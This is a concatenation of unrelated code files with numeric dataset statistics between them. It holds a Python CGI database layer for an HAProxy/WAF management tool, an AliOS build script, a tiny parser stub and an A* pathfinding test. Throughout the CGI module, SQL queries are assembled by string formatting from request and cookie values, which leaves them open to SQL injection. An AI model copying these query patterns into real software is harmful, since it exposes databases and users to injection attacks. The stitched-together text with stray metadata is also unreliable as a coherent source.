    sql = """select serv.ip from waf left join servers as serv on waf.server_id = serv.id """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_waf_servers_metrics(uuid, **kwargs):
    """Return ips of WAF-metrics-enabled servers visible to the session's user."""
    con, cur = get_cur()
    sql = """select * from user where username = '%s' """ % get_user_name_by_uuid(uuid)
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        print("An error occurred:", e)
    else:
        for group in cur:
            if group[5] == '1':
                sql = """select servers.ip from servers left join waf as waf on waf.server_id = servers.id where servers.enable = 1 and waf.metrics = '1' """
            else:
                sql = """select servers.ip from servers left join waf as waf on waf.server_id = servers.id where servers.enable = 1 and waf.metrics = '1' and servers.groups like '%{group}%' """.format(group=group[5])
            try:
                cur.execute(sql)
            except sqltool.Error as e:
                funct.out_error(e)
            else:
                return cur.fetchall()
    cur.close()
    con.close()


def select_waf_metrics(serv, **kwargs):
    """Return the 60 most recent WAF metric samples for `serv`, oldest first."""
    con, cur = get_cur()
    sql = """select * from (select * from waf_metrics where serv = '%s' order by `date` desc limit 60) order by `date`""" % serv
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def insert_waf_metrics_enable(serv, enable):
    """Create the waf row (metrics flag) for the server with ip `serv`."""
    con, cur = get_cur()
    sql = """insert into waf (server_id, metrics) values((select id from servers where ip = '%s'), '%s') """ % (serv, enable)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def delete_waf_server(id):
    """Delete the waf row of server id."""
    con, cur = get_cur()
    sql = """delete from waf where server_id = '%s' """ % id
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def insert_waf_mentrics(serv, conn):
    """Append one WAF connections sample for `serv`, timestamped by the DB."""
    con, cur = get_cur()
    if mysql_enable == '1':
        sql = """insert into waf_metrics (serv, conn, date) values('%s', '%s', now()) """ % (serv, conn)
    else:
        sql = """insert into waf_metrics (serv, conn, date) values('%s', '%s', datetime('now', 'localtime')) """ % (serv, conn)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def delete_waf_mentrics():
    """Drop WAF metric samples older than three days.

    BUGFIX: the original deleted from `metrics` (a copy-paste of
    delete_mentrics), so waf_metrics rows were never pruned.
    """
    con, cur = get_cur()
    if mysql_enable == '1':
        sql = """delete from waf_metrics where date < now() - INTERVAL 3 day """
    else:
        sql = """delete from waf_metrics where date < datetime('now', '-3 days') """
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def update_waf_metrics_enable(name, enable):
    """Set the waf.metrics flag for the server with hostname `name`."""
    con, cur = get_cur()
    sql = """update waf set metrics = %s where server_id = (select id from servers where hostname = '%s') """ % (enable, name)
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def delete_mentrics():
    """Drop HAProxy metric samples older than three days."""
    con, cur = get_cur()
    if mysql_enable == '1':
        sql = """delete from metrics where date < now() - INTERVAL 3 day """
    else:
        sql = """delete from metrics where date < datetime('now', '-3 days') """
    try:
        cur.execute(sql)
        con.commit()
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
    cur.close()
    con.close()


def select_metrics(serv, **kwargs):
    """Return the 60 most recent HAProxy metric samples for `serv`, oldest first."""
    con, cur = get_cur()
    sql = """select * from (select * from metrics where serv = '%s' order by `date` desc limit 60) order by `date` """ % serv
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()
def select_servers_metrics_for_master():
    """Return the ips of every server with HAProxy metrics collection enabled."""
    con, cur = get_cur()
    sql = """select ip from servers where metrics = 1 """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_servers_metrics(uuid, **kwargs):
    """Return metrics-enabled server ips visible to the session's user.

    Group '1' (admin) sees every enabled server; other groups are restricted
    with a LIKE match on servers.groups.
    """
    con, cur = get_cur()
    sql = """select * from user where username = '%s' """ % get_user_name_by_uuid(uuid)
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        print("An error occurred:", e)
    else:
        for group in cur:
            if group[5] == '1':
                sql = """select ip from servers where enable = 1 and metrics = '1' """
            else:
                sql = """select ip from servers where groups like '%{group}%' and metrics = '1'""".format(group=group[5])
            try:
                cur.execute(sql)
            except sqltool.Error as e:
                funct.out_error(e)
            else:
                return cur.fetchall()
    cur.close()
    con.close()


def select_table_metrics(uuid):
    """Return the metrics summary table (avg/max sessions and connections over
    1h / 24h / 3d windows) for every metrics-enabled server the user may see.

    Two dialect-specific variants of the same self-joined aggregate query are
    used: DATE_ADD/NOW() on MySQL, datetime(...) on sqlite.
    """
    con, cur = get_cur()
    groups = ""
    sql = """select * from user where username = '%s' """ % get_user_name_by_uuid(uuid)
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        print("An error occurred:", e)
    else:
        for group in cur:
            if group[5] == '1':
                groups = ""
            else:
                groups = "and servers.groups like '%{group}%' ".format(group=group[5])
    if mysql_enable == '1':
        sql = """select ip.ip, hostname, avg_sess_1h, avg_sess_24h, avg_sess_3d, max_sess_1h, max_sess_24h, max_sess_3d,
            avg_cur_1h, avg_cur_24h, avg_cur_3d, max_con_1h, max_con_24h, max_con_3d from
            (select servers.ip from servers where metrics = 1 ) as ip,
            (select servers.ip, servers.hostname as hostname from servers left join metrics as metr on servers.ip = metr.serv where servers.metrics = 1 %s) as hostname,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(), INTERVAL -1 HOUR) group by servers.ip) as avg_sess_1h,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as avg_sess_24h,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(), INTERVAL -3 DAY) group by servers.ip ) as avg_sess_3d,
            (select servers.ip,max(metr.sess_rate) as max_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as max_sess_1h,
            (select servers.ip,max(metr.sess_rate) as max_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as max_sess_24h,
            (select servers.ip,max(metr.sess_rate) as max_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as max_sess_3d,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as avg_cur_1h,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as avg_cur_24h,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as avg_cur_3d,
            (select servers.ip,max(metr.curr_con) as max_con_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -1 HOUR) group by servers.ip) as max_con_1h,
            (select servers.ip,max(metr.curr_con) as max_con_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -24 HOUR) group by servers.ip) as max_con_24h,
            (select servers.ip,max(metr.curr_con) as max_con_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= now() and metr.date >= DATE_ADD(NOW(),INTERVAL -3 DAY) group by servers.ip ) as max_con_3d
            where ip.ip=hostname.ip and ip.ip=avg_sess_1h.ip and ip.ip=avg_sess_24h.ip and ip.ip=avg_sess_3d.ip
            and ip.ip=max_sess_1h.ip and ip.ip=max_sess_24h.ip and ip.ip=max_sess_3d.ip
            and ip.ip=avg_cur_1h.ip and ip.ip=avg_cur_24h.ip and ip.ip=avg_cur_3d.ip
            and ip.ip=max_con_1h.ip and ip.ip=max_con_24h.ip and ip.ip=max_con_3d.ip
            group by hostname.ip """ % groups
    else:
        sql = """select ip.ip, hostname, avg_sess_1h, avg_sess_24h, avg_sess_3d, max_sess_1h, max_sess_24h, max_sess_3d,
            avg_cur_1h, avg_cur_24h, avg_cur_3d, max_con_1h, max_con_24h, max_con_3d from
            (select servers.ip from servers where metrics = 1 ) as ip,
            (select servers.ip, servers.hostname as hostname from servers left join metrics as metr on servers.ip = metr.serv where servers.metrics = 1 %s) as hostname,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as avg_sess_1h,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as avg_sess_24h,
            (select servers.ip,round(avg(metr.sess_rate), 1) as avg_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as avg_sess_3d,
            (select servers.ip,max(metr.sess_rate) as max_sess_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as max_sess_1h,
            (select servers.ip,max(metr.sess_rate) as max_sess_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as max_sess_24h,
            (select servers.ip,max(metr.sess_rate) as max_sess_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as max_sess_3d,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as avg_cur_1h,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as avg_cur_24h,
            (select servers.ip,round(avg(metr.curr_con+metr.cur_ssl_con), 1) as avg_cur_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as avg_cur_3d,
            (select servers.ip,max(metr.curr_con) as max_con_1h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-1 hours', 'localtime') group by servers.ip) as max_con_1h,
            (select servers.ip,max(metr.curr_con) as max_con_24h from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-24 hours', 'localtime') group by servers.ip) as max_con_24h,
            (select servers.ip,max(metr.curr_con) as max_con_3d from servers left join metrics as metr on metr.serv = servers.ip where servers.metrics = 1 and metr.date <= datetime('now', 'localtime') and metr.date >= datetime('now', '-3 days', 'localtime') group by servers.ip ) as max_con_3d
            where ip.ip=hostname.ip and ip.ip=avg_sess_1h.ip and ip.ip=avg_sess_24h.ip and ip.ip=avg_sess_3d.ip
            and ip.ip=max_sess_1h.ip and ip.ip=max_sess_24h.ip and ip.ip=max_sess_3d.ip
            and ip.ip=avg_cur_1h.ip and ip.ip=avg_cur_24h.ip and ip.ip=avg_cur_3d.ip
            and ip.ip=max_con_1h.ip and ip.ip=max_con_24h.ip and ip.ip=max_con_3d.ip
            group by hostname.ip """ % groups
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def get_setting(param, **kwargs):
    """Return the value of setting `param`, or all settings rows with all=1."""
    con, cur = get_cur()
    sql = """select value from `settings` where param='%s' """ % param
    if kwargs.get('all'):
        sql = """select * from `settings` order by section desc"""
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        if kwargs.get('all'):
            return cur.fetchall()
        else:
            for value in cur.fetchone():
                return value
    cur.close()
    con.close()
def update_setting(param, val):
    """Set the value of setting `param`; return True on success, False on DB error."""
    con, cur = get_cur()
    sql = """update `settings` set `value` = '%s' where param = '%s' """ % (val, param)
    try:
        cur.execute(sql)
        con.commit()
        return True
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    cur.close()
    con.close()


def get_ver():
    """Return the stored application version (first column of the version table)."""
    con, cur = get_cur()
    sql = """select * from version; """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for ver in cur.fetchall():
            return ver[0]
    cur.close()
    con.close()


def select_roles(**kwargs):
    """Return role rows: all roles ordered by id, or one by `roles` (name)."""
    con, cur = get_cur()
    sql = """select * from role ORDER BY id"""
    if kwargs.get("roles") is not None:
        sql = """select * from role where name='%s' """ % kwargs.get("roles")
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_alert(**kwargs):
    """Return the ips of servers with alerting enabled."""
    con, cur = get_cur()
    sql = """select ip from servers where alert = 1 """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_keep_alive(**kwargs):
    """Return the ips of servers with keep-alive checking enabled."""
    con, cur = get_cur()
    sql = """select ip from servers where active = 1 """
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        return cur.fetchall()
    cur.close()
    con.close()


def select_keealived(serv, **kwargs):
    """Return the keepalived flag of the server with ip `serv`."""
    con, cur = get_cur()
    sql = """select keepalived from `servers` where ip='%s' """ % serv
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for value in cur.fetchone():
            return value
    cur.close()
    con.close()


def update_keepalived(serv):
    """Mark the server with ip `serv` as running keepalived; return True/False."""
    con, cur = get_cur()
    sql = """update `servers` set `keepalived` = '1' where ip = '%s' """ % serv
    try:
        cur.execute(sql)
        con.commit()
        return True
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    cur.close()
    con.close()


def select_nginx(serv, **kwargs):
    """Return the nginx flag of the server with ip `serv`."""
    con, cur = get_cur()
    sql = """select nginx from `servers` where ip='%s' """ % serv
    try:
        cur.execute(sql)
    except sqltool.Error as e:
        funct.out_error(e)
    else:
        for value in cur.fetchone():
            return value
    cur.close()
    con.close()


def update_nginx(serv):
    """Mark the server with ip `serv` as running nginx; return True/False."""
    con, cur = get_cur()
    sql = """update `servers` set `nginx` = '1' where ip = '%s' """ % serv
    try:
        cur.execute(sql)
        con.commit()
        return True
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    cur.close()
    con.close()


def update_haproxy(serv):
    """Mark the server with ip `serv` as running haproxy; return True/False."""
    con, cur = get_cur()
    sql = """update `servers` set `haproxy` = '1' where ip = '%s' """ % serv
    try:
        cur.execute(sql)
        con.commit()
        return True
    except sqltool.Error as e:
        funct.out_error(e)
        con.rollback()
        return False
    cur.close()
    con.close()


def check_token_exists(token):
    """Return True when `token` matches the stored token for the session uuid
    taken from the HTTP_COOKIE environment; otherwise log and return False."""
    try:
        import http.cookies
        import os
        cookie = http.cookies.SimpleCookie(os.environ.get("HTTP_COOKIE"))
        user_id = cookie.get('uuid')
        if get_token(user_id.value) == token:
            return True
        else:
            try:
                funct.logging('localhost', ' tried do action with wrong token', haproxywi=1, login=1)
            except:
                funct.logging('localhost', ' An action with wrong token', haproxywi=1)
            return False
    except:
        try:
            funct.logging('localhost', ' cannot check token', haproxywi=1, login=1)
        except:
            funct.logging('localhost', ' Cannot check token', haproxywi=1)
        return False


# CGI form and the shared validation-error banner used by the handlers below.
form = funct.form
error_mess = '<span class="alert alert-danger" id="error">All fields must be completed <a title="Close" id="errorMess"><b>X</b></a></span>'


def check_token():
    """Abort the CGI request when the submitted token is invalid or expired."""
    if not check_token_exists(form.getvalue('token')):
        print('Content-type: text/html\n')
        print("Your token has been expired")
        import sys
        sys.exit()


def show_update_option(option):
    """Render the updated-option fragment for the given option."""
    from jinja2 import Environment, FileSystemLoader
    env = Environment(loader=FileSystemLoader('templates/ajax'), autoescape=True)
    template = env.get_template('/new_option.html')
    print('Content-type: text/html\n')
    template = template.render(options=select_options(option=option))
    print(template)


def show_update_savedserver(server):
    """Render the updated-saved-server fragment for the given server."""
    from jinja2 import Environment, FileSystemLoader
    env = Environment(loader=FileSystemLoader('templates/ajax'), autoescape=True)
    template = env.get_template('/new_saved_servers.html')
    print('Content-type: text/html\n')
    template = template.render(server=select_saved_servers(server=server))
    print(template)


# ---- CGI dispatch: each branch below handles one form action. ----

if form.getvalue('getoption'):
    # Autocomplete lookup for options: respond with {index: option} JSON.
    group = form.getvalue('getoption')
    term = form.getvalue('term')
    print('Content-type: application/json\n')
    check_token()
    options = select_options(group=group, term=term)
    a = {idx: row[0] for idx, row in enumerate(options)}
    import json
    print(json.dumps(a))

if form.getvalue('newtoption'):
    option = form.getvalue('newtoption')
    group = form.getvalue('newoptiongroup')
    print('Content-type: text/html\n')
    check_token()
    if option is None or group is None:
        print(error_mess)
    else:
        if insert_new_option(option, group):
            show_update_option(option)

if form.getvalue('updateoption') is not None:
    option = form.getvalue('updateoption')
    id = form.getvalue('id')
    check_token()
    if option is None or id is None:
        print('Content-type: text/html\n')
        print(error_mess)
    else:
        update_options(option, id)

if form.getvalue('optiondel') is not None:
    print('Content-type: text/html\n')
    check_token()
    if delete_option(form.getvalue('optiondel')):
        print("Ok")

if form.getvalue('getsavedserver'):
    # Autocomplete lookup for saved servers: {index: {value, desc}} JSON.
    group = form.getvalue('getsavedserver')
    term = form.getvalue('term')
    print('Content-type: application/json\n')
    check_token()
    servers = select_saved_servers(group=group, term=term)
    a = {idx: {'value': row[0], 'desc': row[1]} for idx, row in enumerate(servers)}
    import json
    print(json.dumps(a))

if form.getvalue('newsavedserver'):
    savedserver = form.getvalue('newsavedserver')
    description = form.getvalue('newsavedserverdesc')
    group = form.getvalue('newsavedservergroup')
    print('Content-type: text/html\n')
    check_token()
    if savedserver is None or group is None:
        print(error_mess)
    else:
        if insert_new_savedserver(savedserver, description, group):
            show_update_savedserver(savedserver)

if form.getvalue('updatesavedserver') is not None:
    savedserver = form.getvalue('updatesavedserver')
    description = form.getvalue('description')
    id = form.getvalue('id')
    print('Content-type: text/html\n')
    check_token()
    if savedserver is None or id is None:
        print(error_mess)
    else:
        update_savedserver(savedserver, description, id)

if form.getvalue('savedserverdel') is not None:
    print('Content-type: text/html\n')
    check_token()
    if delete_savedserver(form.getvalue('savedserverdel')):
        print("Ok")
28.365116
223
0.638333
7,372
48,788
4.119778
0.035404
0.038096
0.052748
0.058609
0.829278
0.805769
0.76955
0.73399
0.688617
0.661058
0
0.007759
0.210175
48,788
1,719
224
28.381617
0.780402
0.000881
0
0.752343
0
0.04083
0.422009
0.028578
0
0
0
0
0
1
0.057564
false
0.008701
0.008032
0
0.119813
0.018742
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a0e09e76133e146c4da55d9f084f1d66d03aa16
1,739
py
Python
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
jinlongliu/AliOS-Things
ce051172a775f987183e7aca88bb6f3b809ea7b0
[ "Apache-2.0" ]
54
2018-10-10T01:43:10.000Z
2022-02-26T01:36:40.000Z
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
IamBaoMouMou/AliOS-Things
195a9160b871b3d78de6f8cf6c2ab09a71977527
[ "Apache-2.0" ]
4
2019-04-28T04:07:47.000Z
2021-07-05T13:30:01.000Z
platform/mcu/stm32f4xx/peripherals/libraries/ucube.py
IamBaoMouMou/AliOS-Things
195a9160b871b3d78de6f8cf6c2ab09a71977527
[ "Apache-2.0" ]
48
2018-08-14T07:12:33.000Z
2022-03-01T03:52:32.000Z
src = Split(''' system_stm32f4xx.c STM32F4xx_StdPeriph_Driver/src/misc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_adc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_can.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_crc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dac.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dbgmcu.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_dma.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_exti.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_flash.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_gpio.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rng.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_i2c.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_iwdg.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_pwr.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rcc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_rtc.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_sdio.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_spi.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_syscfg.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_tim.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_usart.c STM32F4xx_StdPeriph_Driver/src/stm32f4xx_wwdg.c ''') component = aos_component('STM32F4xx_Peripheral_Libraries', src) if aos_global_config.get('HOST_MCU_VARIANT') not in ['STM32F411', 'STM32F401']: component.add_sources('STM32F4xx_StdPeriph_Driver/src/stm32f4xx_fsmc.c') if aos_global_config.get('HOST_MCU_VARIANT') == 'STM32F412': component.add_sources('STM32F4xx_StdPeriph_Driver/src/stm32f4xx_qspi.c') component.add_global_includes('STM32F4xx_StdPeriph_Driver/inc', '../../../' +aos_global_config.arch +'/CMSIS')
48.305556
110
0.776883
219
1,739
5.753425
0.242009
0.357143
0.47619
0.514286
0.780159
0.757937
0.14127
0.14127
0
0
0
0.110963
0.139735
1,739
35
111
49.685714
0.731283
0
0
0
0
0
0.846463
0.673951
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a11da68bba8faf93b53a90eec95ad0b60f58541
101
py
Python
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
peco/parser/read_at.py
Tikubonn/peco
c77fc163ad31d3c271d299747914ce4ef3386987
[ "MIT" ]
null
null
null
from peco.template import TextNode def read_at(preread, stream, parser): return TextNode("@")
14.428571
37
0.722772
13
101
5.538462
0.923077
0
0
0
0
0
0
0
0
0
0
0
0.168317
101
6
38
16.833333
0.857143
0
0
0
0
0
0.01
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
2a74892960ef59aac7095ea2d6b9909c47a92b5f
2,507
py
Python
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
1
2021-03-25T02:28:52.000Z
2021-03-25T02:28:52.000Z
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
null
null
null
test/test_AStarPython.py
tianyuzhou-sam/astar-algorithm-cpp
056ef5b8dd5644bbc0ee1548f2be00461132ceec
[ "MIT" ]
1
2022-02-03T04:32:29.000Z
2022-02-03T04:32:29.000Z
#!/usr/bin/env python3 import os import sys sys.path.append(os.getcwd()+'/build') import AStarPython if __name__ == "__main__": # define the world map map_width = 20 map_height = 20 world_map = [ # 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # 00 1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,1, # 01 1,9,9,1,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 02 1,9,9,1,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 03 1,9,1,1,1,1,9,9,1,9,1,9,1,1,1,1,9,9,1,1, # 04 1,9,1,1,9,1,1,1,1,9,1,1,1,1,9,1,1,1,1,1, # 05 1,9,9,9,9,1,1,1,1,1,1,9,9,9,9,1,1,1,1,1, # 06 1,9,9,9,9,9,9,9,9,1,1,1,9,9,9,9,9,9,9,1, # 07 1,9,1,1,1,1,1,1,1,1,1,9,1,1,1,1,1,1,1,1, # 08 1,9,1,9,9,9,9,9,9,9,1,1,9,9,9,9,9,9,9,1, # 09 1,9,1,1,1,1,9,1,1,9,1,1,1,1,1,1,1,1,1,1, # 10 1,9,9,9,9,9,1,9,1,9,1,9,9,9,9,9,1,1,1,1, # 11 1,9,1,9,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 12 1,9,1,9,1,9,9,9,1,9,1,9,1,9,1,9,9,9,1,1, # 13 1,9,1,1,1,1,9,9,1,9,1,9,1,1,1,1,9,9,1,1, # 14 1,9,1,1,9,1,1,1,1,9,1,1,1,1,9,1,1,1,1,1, # 15 1,9,9,9,9,1,1,1,1,1,1,9,9,9,9,1,1,1,1,1, # 16 1,1,9,9,9,9,9,9,9,1,1,1,9,9,9,1,9,9,9,9, # 17 1,9,1,1,1,1,1,1,1,1,1,9,1,1,1,1,1,1,1,1, # 18 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 # 19 ] # for AStarPython, 0 for no obstacles; 255 for obstacles for idx in range(len(world_map)): if world_map[idx] == 9: world_map[idx] = 255 else: world_map[idx] = 0 # define the start and goal start = [0, 0] end = [14, 10] path, steps_used = AStarPython.FindPath(start, end, world_map, map_width, map_height) print("This is the path. " + "Steps used:" + str(steps_used)) for idx in range(0,len(path),2): str_print = str(path[idx]) + ', ' + str(path[idx+1]) print(str_print) # This is for an agent and a set of targets agent_position = [0, 0] targets_position = [0,19, 19,19, 19,0] path_many, steps_all = AStarPython.FindPathAll(agent_position, targets_position, world_map, map_width, map_height) print("These are all the paths:") for i in range(0,len(path_many),1): print("This is a path. 
" + "Steps used:" + str(steps_all[i])) for j in range(0,len(path_many[i]),2): str_print = str(path_many[i][j]) + ', ' + str(path_many[i][j+1]) print(str_print)
39.793651
118
0.512964
645
2,507
1.934884
0.125581
0.240385
0.269231
0.278846
0.485577
0.399038
0.366186
0.314103
0.307692
0.290064
0
0.275862
0.248105
2,507
63
119
39.793651
0.386207
0.113682
0
0.28
0
0
0.044606
0
0
0
0
0
0
1
0
false
0
0.06
0
0.06
0.14
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2a822e828d65883bbfa7463fe18c91a0b22a5e47
29
py
Python
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
stalker/__init__.py
caian-org/stock-stalker
e571341a748cf6117ffbe39077f5a4f1e2f5abd7
[ "CC0-1.0" ]
null
null
null
